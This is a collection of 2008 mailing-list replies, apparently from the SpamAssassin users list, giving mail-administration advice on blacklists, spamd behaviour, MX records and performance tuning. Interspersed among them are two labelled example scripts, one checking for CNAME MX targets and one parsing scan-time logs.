> As an aside, I'd be interested to know how much, if any, spam you get to your IPv6 only server. I had one for a short while a number of years ago and didn't get any mail at all.
IPv6 usage depends on your environment and the user-base you are dealing with. Some educational institutions exchange a significant amount of mail over IPv6. The amount of spam is still quite low or non-existent for some.
Regards, -sm
Re: SURBL Usage Policy change
At 16:58 11-11-2008, Dave Koontz wrote:
> Given this change in SURBL policy and pricing, I would strongly suggest removing their rules from the SA rule base. Otherwise, you will likely get lots of complaints from users of systems that have embedded SA installs, or others who do not monitor this list. I can see many Barracuda users not having a clue why they are now being blocked and their systems are processing messages slower as a result.
Most blacklists have a usage policy where you are charged if your site generates more than X queries. As the SpamAssassin rule base contains several blacklists which are pay-ware, those rules would have to be removed as well. Barracuda users being blocked is not a SpamAssassin issue. Do you want SpamAssassin to include a warning that external charges may apply if the blacklists included in the rule base are used to process more than X messages or if your site has more than Y users?
Regards, -sm
Re: Spamassassin Restart and E-Mail being scanned at time of restart.
Hi Michael,
At 14:45 12-11-2008, Michael Hutchinson wrote:
> I am wondering, what happens to E-Mail that is being scanned when the root user on the mail system restarts Spamassassin? I see lots of Spamd children before it is restarted and they suddenly all drop off on a restart (as expected). Do the E-Mails being scanned at that time actually get re-scanned or do they only get partially scanned, and then delivered? It would appear that the number of child processes does not increase quickly back to what it was before, suggesting the E-Mails that were being scanned at restart time do not get fully scanned. Does anyone know what the score is here?
SpamAssassin does content filtering only. The software interacting with SpamAssassin determines the action to take, i.e. whether to block or drop the email, etc. If spamd is restarted while an email is being scanned, the software interacting with SpamAssassin will not get a negative or positive response. The software might defer mail delivery and retry later, hence causing a rescan.
Regards, -sm
Re: Accidentally Filtering through Spamassassin Twice
At 07:22 06-11-2008, Joe Dragotta wrote:
> I would presume that if the global procmailrc file, in /etc/, forwards mail to Spamassassin, and the users have individual .procmailrc files, in their home directories, which also forward mail to Spamassassin, any mail destined for such a user would be filtered twice. Is that a correct assumption?
Yes.
> So I'm probably wasting resources if my Spamassassin host is configured as such?
Yes. See http://wiki.apache.org/spamassassin/UsedViaProcmail for more information about calling SpamAssassin from procmail.
Regards, -sm
Re: Accidentally Filtering through Spamassassin Twice
At 15:00 06-11-2008, Joe Dragotta wrote:
> Not being very experienced in SA administration, I didn't know if SA would process the same email twice, or if it kept track of message IDs and only processed them once. Thusly, I needed to know whether or not my originally described scenario would send the emails to SA twice, and subsequently, if SA would filter them twice; which apparently is the case.
The message would be processed twice. It won't be learned twice by the Bayesian filter. SpamAssassin does content analysis. It doesn't filter messages. When you pass a message to SpamAssassin, it analyses the content and returns a score. In your case, it's procmail that does the filtering by redirecting the message.
> In any event, I am moving to use the spamd/c combination, in lieu of invoking SA from procmail.
By using spamd, you avoid the startup overhead. spamc will pass the message to the spamd daemon and get the result.
Regards, -sm
Re: prefork: oops! no idle kids in need_to_del_server?
At 10:18 02-11-2008, Per Jessen wrote:
> OK, this is beginning to be annoying - I've seen it 4-5 times in the last week. I'll probably have to cobble up a quick spamd auto-restart. Is no-one else running spamd and using SIGHUP for reloading the config?
The configuration reloads correctly. See whether your issue is OS specific.
Regards, -sm
Re: Phishing rules?
At 07:56 01-11-2008, Micah Anderson wrote:
> Here is an example one I received recently, note the hideously low bayes score on this one, caused it to autolearn as ham even, grr.
> [snip]
> X-Spam-Status: No, score=-3.6 required=5.0 tests=BAYES_00,RCVD_IN_DNSWL_LOW autolearn=ham version=3.2.5
The sender is whitelisted by www.dnswl.org.
> Received: from master.debian.org (master.debian.org [70.103.162.29]) by mx1.riseup.net (Postfix) with ESMTP id AA4465701D1 for [EMAIL PROTECTED]; Fri, 31 Oct 2008 20:00:39 -0700 (PDT)
The mail is coming through debian.org. Do you want to blacklist that host?
Regards, -sm
Re: Spamassassin+amavis
At 05:51 30-10-2008, Luis Hernán Otegui wrote:
> Just to check, you know you should run a RBL check in Postfix BEFORE it accepts the message, do you? This reduces dramatically the number of messages your server has to scan. And improves the performance a lot.
You should not run RBL checks on outbound mail where the customer is relaying through your mail server.
Regards, -sm
Re: Spamassassin+amavis
At 16:56 23-10-2008, Luis Croker wrote:
> I have a mail server with FreeBSD 7.0, postfix+amavis-new+spamassassin. We are an ISP and I need to filter the spam that our subscribers are sending to the internet, the PCs have some malware or are botnets. These PCs generate a lot of spam each day. The server filters a lot of spam but sometimes the queue is so crowded. I have two questions... Do you have any recommendation to improve the performance on the server??
http://wiki.apache.org/spamassassin/FasterPerformance
> How can I catch more spam than the server is filtering? The server blocks many messages but other spam messages go to the internet because the score does not reach the parameters to be blocked.
If you are running an old version of SpamAssassin, update it. Run sa-update to keep the rules updated. Analyze SMTP traffic to detect any signs of abuse and quarantine these hosts. You may have to reach out to the customers and help them clean infected hosts. Use the feedback from your abuse department. You can also get feedback from anti-abuse groups and subscribe to feedback loops. Identify the spam messages not reaching the threshold and add rules to catch them.
Regards, -sm
Re: Spamassassin+amavis
At 10:12 24-10-2008, Luis Croker wrote:
> I have updated the SARE rules... how often should I update them? Daily?
It's been a while since the SARE rules have been updated. Checking for updates daily would only generate useless traffic. It's better to get the updates provided by the SpamAssassin project ( http://wiki.apache.org/spamassassin/RuleUpdates ). The sought rules ( http://wiki.apache.org/spamassassin/SoughtRules ) are quite effective in catching fresh spam messages.
Regards, -sm
Re: bogusmx [Was: DNS restrictions for a mail server]
Hi Michael,
At 08:58 23-10-2008, Michael Scheidell wrote:
> Why? It's being widely used by 'email experts' and hosted email anti-spam companies now.
The section of the SMTP standard that discusses MX records is commonly misinterpreted by some people. Even if CNAMEs are widely used, that doesn't mean that it is correct. A lot of things work 99% of the time. Quoting RFC 2182 which explains the matter:
    Searching for either NS or MX records causes additional section processing in which address records associated with the value of the record sought are appended to the answer. This helps avoid needless extra queries that are easily anticipated when the first was made.
    Additional section processing does not include CNAME records, let alone the address records that may be associated with the canonical name derived from the alias. Thus, if an alias is used as the value of an NS or MX record, no address will be returned with the NS or MX value. This can cause extra queries, and extra network burden, on every query. It is trivial for the DNS administrator to avoid this by resolving the alias and placing the canonical name directly in the affected record just once when it is updated or installed. In some particular hard cases the lack of the additional section address records in the results of a NS lookup can cause the request to fail.
The SMTP standard discusses how to locate a target host and points to the above section to explain the prohibition of CNAMEs. A strict reading of the section about locating a target host shows that the behavior is undefined when CNAMEs are used. This means that you might end up with unexpected results. One can go back to the standard about mail routing to understand how mail preferences are processed to determine where a message should be delivered. That influenced the decision on discouraging CNAMEs in the data section of MX RRs.
My comment is not about bogusmx or antispam; it's about how to determine in a reliable way where to deliver a message.
Regards, -sm
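The RFC 2182 passage quoted above is easier to see than to read. The following is an added example, not part of the original thread: a tiny in-memory zone and a resolver that applies additional-section processing as RFC 2182 describes it (addresses of an MX target ride along in the MX answer; a CNAME target gets nothing appended), so the extra round trips an MTA pays for an aliased MX target show up as a query count. All names and addresses are constructed sample data, and bogus_mx_targets is the administrator-side check an operator could run over their own records.

```python
"""MX targets that are CNAMEs cost extra lookups (RFC 2182 section 3).

Added example, not code from any MTA or DNS server. Zone contents, names and
addresses below are constructed sample data.
"""
from dataclasses import dataclass, field


@dataclass
class Answer:
    records: list     # (owner, type, rdata) tuples in the answer section
    additional: list  # address records the server chose to append


@dataclass
class Zone:
    rrsets: dict = field(default_factory=dict)  # (owner, type) -> [rdata, ...]

    def add(self, owner, rtype, rdata):
        self.rrsets.setdefault((owner, rtype), []).append(rdata)

    def query(self, name, rtype) -> Answer:
        """Answer a query. For MX answers, append A records for each MX target
        that owns A records directly. A target that is a CNAME gets no
        additional data ('Additional section processing does not include
        CNAME records', RFC 2182)."""
        answer = [(name, rtype, rd) for rd in self.rrsets.get((name, rtype), [])]
        additional = []
        if rtype == "MX":
            for _pref, target in self.rrsets.get((name, "MX"), []):
                for addr in self.rrsets.get((target, "A"), []):
                    additional.append((target, "A", addr))
        return Answer(answer, additional)


def resolve_mx_addresses(zone: Zone, domain: str):
    """What an MTA does to find where to deliver: fetch MX, then make sure it
    has an address for every target. Returns (addresses, query_count,
    aliased_targets) so the cost of CNAME targets is visible."""
    mx = zone.query(domain, "MX")
    queries = 1
    have = {}
    for owner, _t, rdata in mx.additional:
        have.setdefault(owner, []).append(rdata)
    addresses, aliased = [], []
    for _pref, target in sorted(rd for _o, _t, rd in mx.records):
        if target in have:                   # came for free in the MX answer
            addresses.extend(have[target])
            continue
        cname = zone.query(target, "CNAME")  # extra round trip: is it an alias?
        queries += 1
        if cname.records:
            aliased.append(target)
            target = cname.records[0][2]     # follow the alias to the real host
        a = zone.query(target, "A")          # extra round trip: its address
        queries += 1
        addresses.extend(rd for _o, _t, rd in a.records)
    return addresses, queries, aliased


def bogus_mx_targets(zone: Zone, domain: str):
    """Administrator-side check: list MX targets that are CNAMEs."""
    return [t for _p, t in zone.rrsets.get((domain, "MX"), [])
            if (t, "CNAME") in zone.rrsets]


def build_sample_zone() -> Zone:
    """Constructed zone: one domain done right, one with an aliased MX target."""
    z = Zone()
    z.add("good.example", "MX", (10, "mail.good.example"))
    z.add("mail.good.example", "A", "192.0.2.10")
    z.add("alias.example", "MX", (10, "mx.alias.example"))
    z.add("mx.alias.example", "CNAME", "smtp.hosting.example")
    z.add("smtp.hosting.example", "A", "198.51.100.25")
    return z


if __name__ == "__main__":
    zone = build_sample_zone()
    for name in ("good.example", "alias.example"):
        print(name, resolve_mx_addresses(zone, name), bogus_mx_targets(zone, name))
```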
Re: bogusmx [Was: DNS restrictions for a mail server]
At 10:29 23-10-2008, Michael Scheidell wrote:
> we aren't arguing rfc's, and by '99% of the time', actually, it works 100% of the time unless you use the rfc-ignorant blacklists.
If it works 100% of the time for you, what can I say.
> I don't know if, or, since you are the expert in this, maybe you can enlighten us.. What major mail server can't deliver email to a mx record that is a cname? if there were technical problems, then the major email hosted providers would not be using it.
I doubt I'm an expert. Current versions of Postfix and sendmail handle the CNAME. There are some configuration cases where sendmail may generate a delivery failure. I don't use major email hosted providers as a yardstick. There was one major email hosted provider that rejected messages if the sending domain listed an IPv6 host as one of the MX targets. I suggest that we agree to disagree as we are not arguing about the same thing.
Regards, -sm
Re: DNS_FROM_SECURITYSAGE broken?
At 14:22 07-10-2008, David B Funk wrote: I recently noticed that DNS_FROM_SECURITYSAGE was hitting everything. http://issues.apache.org/SpamAssassin/show_bug.cgi?id=5672 Regards, -sm
Re: DOB blocklist seems to have very old domains
At 11:00 05-10-2008, Ralf Hildebrandt wrote: python.org is also listed: Domain Name:PYTHON.ORG Created On:27-Mar-1995 05:00:00 UTC Last Updated On:07-Sep-2006 20:50:54 UTC Expiration Date:28-Mar-2016 05:00:00 UTC It looks like a processing glitch. I sent them an email about the problem. Regards, -sm
Re: New free blacklist: BRBL - Barracuda Reputation Block List
At 11:24 23-09-2008, Kris Deugau wrote: I can't think of ANY reasons (beyond sysadmin and/or ISP incompentence) that a public IP originating legitimate SMTP traffic should not have a reverse DNS entry. (Never mind a properly-formed one, a whole other argument on its own.) There was a mailing list for a well-known open source project originating legitimate SMTP traffic for a few days from a host without reverse DNS. The reason was not sysadmin or ISP incompetence. Regards, -sm
Re: sa-update with proxy
Hi Alangchang, At 06:40 21-09-2008, Alangchang Zuuzuu wrote: Now I try to update rule of spamassassin through proxy. I inserted http://proxy:port in /etc/wgetrc already but when I type command #sa-update -D I see this : [snip]
[8931] dbg: channel: no MIRRORED.BY file available
[8931] dbg: http: GET request, spamassassin.apache.org/updates/MIRRORED.BY
[8931] dbg: http: request failed, retrying: 500 Can't connect to spamassassin.apache.org:80 (connect: timeout): 500 Can't connect to spamassassin.apache.org:80 (connect: timeout)

sa-update does not use wget to download updates. From http://wiki.apache.org/spamassassin/RuleUpdates

  sa-update uses the LWP::UserAgent module, which allows certain environment variables to be set so that requests use defined proxy servers. The main one of interest is http_proxy, which should be set to an URL defining the proxy. i.e.: export http_proxy='http://proxy.example.com:8080/'

Regards, -sm
RE: New free blacklist: BRBL - Barracuda Reputation Block List
At 03:24 22-09-2008, Chris Russell wrote: I've had servers listed on Barracuda before, despite 17 emails to their support systems we never had any response, and had to change a customers mail architecture to compensate. It's a free blacklist. People will use it until they get listed and find out that there is no way to get unlisted as the blacklist is said to be accurate or there's no delisting policy. This new free blacklist has not published its listing methodology yet. There is a removal request link. I'll wait for someone to get listed to find out whether that actually works. Regards, -sm
Re: New free blacklist: BRBL - Barracuda Reputation Block List
At 08:58 22-09-2008, Matt wrote: Everyone should block/defer ALL email with no reverse DNS. Then maybe those email admins would get a clue. Assuming you have signed up for that service, would you whitelist the sending host or wait for the postmaster to get a clue? Regards, -sm
Re: Trying out a new concept
Hi Blaine, At 17:00 22-09-2008, Blaine Fleming wrote: Honestly, on my system I have less than 0.01% hits against a list of domains registered in the last five days so I've always considered the list a failure. However, several others are reporting excellent hit rates on it. I think it is because the test is so far after everything else though. Even if your traffic patterns are different, the hit rates shouldn't be that low. There would be a difference if your MTA uses a DNSBL to reject or if you apply other pre-content filtering techniques. Regards, -sm
Re: Trobles with spamassassin
Hi Francesco, At 00:34 19-09-2008, Vincenti Francesco wrote: My system has the following characteristics:
- A two-node cluster, active-active, one for the incoming email and the other for the outgoing email. If a node crashes, the other brings the service on its shoulders.
- Each node has 4GB RAM and two processors
- O.S. Fedora core 3
- Mail server qmail 1.0.3
- Antivirus clamav 0.87.1
- Antispam spamassassin 3.0.4
- Cluster controller heartbeat
- Interface qmail-scanner-queue.pl

That version of SpamAssassin is quite old.

Starting from the 15th of July, I find, sometimes, in the log file of qmail-scanner-queue.pl the following alert instead of normal score: SA: finished scan in 600.010015 secs - hits=?/?. I have already searched on the official site of spamassassin and it seems to be generated by some kind of trouble using the web scan. I really used pyzor and razor2 scans, so I took them out from local.cf. This action caused the decrease of average processing time from 15 seconds to 3.5 seconds for each treated email. But I still have some kind of web search because the system is configured to use RBL search too, and I can't take it out. The time has been improved but the problem stays! I have to write and to upgrade a local configuration file, named local_rules.cf which has reached the dimension of 250KB; it is very useful to stop a lot of SPAM which is not stopped by the other rules. The problem started to appear after one of the upgrades I usually have to do, which wasn't so dramatic to justify this behaviour, I think.

I gather that you have read http://wiki.apache.org/spamassassin/FasterPerformance The large local rules file will affect performance. If you want to keep pyzor and razor2, see http://wiki.apache.org/spamassassin/UsingNetworkTests on how to reduce the timeout values. Run spamd with the -D switch to find out whether there are any errors. Regards, -sm
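The symptom in the message is visible in the qmail-scanner log: a scan that ran for roughly 600 seconds and ended with hits=?/?, i.e. no verdict at all, rather than a slow scan that still scored the message. Before changing timeouts it helps to measure how often that happens and how long ordinary scans take. The following is an added example, not code from the thread or from qmail-scanner: it parses lines in the format of the one quoted above (the other sample lines are constructed), treats hits=?/? as a scan that produced no score, and summarises timeouts and slow scans so the effect of a timeout change can be compared before and after. The 30-second "slow" threshold is an assumption chosen for the example.

```python
"""Summarise SpamAssassin scan times from qmail-scanner log lines.

Added example, not part of the mailing-list thread.  Only the one line the
poster quoted is real in form; the rest of SAMPLE_LOG is constructed to
exercise the parser.  A line ending in hits=?/? is treated as a scan that
returned no score (in the thread, the sign of a network-test timeout).
"""
import re
import statistics

SCAN_RE = re.compile(
    r"SA: finished scan in (?P<secs>[0-9]+(?:\.[0-9]+)?) secs - "
    r"hits=(?P<score>[^/\s]+)/(?P<required>\S+)"
)

# Constructed sample log (format follows the line quoted in the thread).
SAMPLE_LOG = """\
SA: finished scan in 2.913711 secs - hits=7.2/5.0
SA: finished scan in 3.402118 secs - hits=0.4/5.0
SA: finished scan in 600.010015 secs - hits=?/?
SA: finished scan in 41.208853 secs - hits=12.9/5.0
Clear:RC:0(192.0.2.10):SA:0(0.4/5.0):3.402118s
SA: finished scan in 1.955004 secs - hits=-1.3/5.0
SA: finished scan in 600.007221 secs - hits=?/?
"""


def parse_scan(line):
    """Return a dict for a 'finished scan' line, or None for any other line."""
    m = SCAN_RE.search(line)
    if not m:
        return None
    no_verdict = m.group("score") == "?"
    return {
        "secs": float(m.group("secs")),
        "score": None if no_verdict else float(m.group("score")),
        "required": None if no_verdict else float(m.group("required")),
        "no_verdict": no_verdict,
    }


def summarize(lines, slow_threshold=30.0):
    """Aggregate scan records: how many scans, how many produced no verdict,
    how many completed scans were slower than `slow_threshold` seconds, and
    the mean and maximum duration of the scans that did return a score."""
    scans = [s for s in (parse_scan(l) for l in lines) if s]
    completed = [s for s in scans if not s["no_verdict"]]
    durations = [s["secs"] for s in completed]
    return {
        "scans": len(scans),
        "no_verdict": sum(1 for s in scans if s["no_verdict"]),
        "slow_completed": sum(1 for d in durations if d > slow_threshold),
        "mean_completed_secs": statistics.mean(durations) if durations else 0.0,
        "max_completed_secs": max(durations) if durations else 0.0,
        "scored_spam": sum(1 for s in completed if s["score"] >= s["required"]),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG.splitlines()).items():
        print("%-20s %s" % (key, value))
```

Run it against the real qmail-scanner log (for example `summarize(open(path))`) after lowering the network-test timeouts and again a day later: the no_verdict count should fall to zero while mean_completed_secs stays flat or drops, which is the evidence that the timeout change rather than the rule file was the cause.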
RE: spamassassin can't rewrite subject in cpanel 11?
At 06:19 18-09-2008, Bowie Bailey wrote: This works on Outlook, but header tests were not available in Outlook Express the last time I checked. In Outlook Express, you can have a rule for the Subject line. Regards, -sm
Re: FM_FAKE_HELO_VERIZON
At 03:33 14-09-2008, jpff wrote: I have a user of a mailing list who is sending from a Verizon system, and is being marked as spam. Some is use of HTML etc but
* 2.0 BOTNET_CLIENT Relay has a client-like hostname [botnet_client,ip=206.46.173.1,hostname=vms173001pub.verizon.net, ipinhostname]
* 2.6 FM_FAKE_HELO_VERIZON Looks like a fake verizon.net helo.
are the two that do not seem to be under control. The mailing list archive seems to be hiding the headers at present.

The first rule is not a SpamAssassin (project) rule. It incorrectly detects the hostname as a botnet client. A bug report has been posted for the second rule. Regards, -sm
Re: MagicSpam
At 09:44 12-09-2008, Jesse Stroik wrote: setups if they want the largest possible customer base. Consider the difference between the primary goals of spamassassin and arbitrary commercial anti-spam solution: Spamassassin: To facilitate a community effort with the primary goal of accurate reduction of spam.

There is SpamAssassin the project and SpamAssassin the software. The project, under the aegis of the Apache Software Foundation, provides a framework to support open source software development to deliver an enterprise-grade, freely available software product for the public benefit. SpamAssassin, the software, is a mail filter to identify spam. It is designed for easy integration into any email system. The cost to develop such software is estimated to be around US $1.1 million. Regards, -sm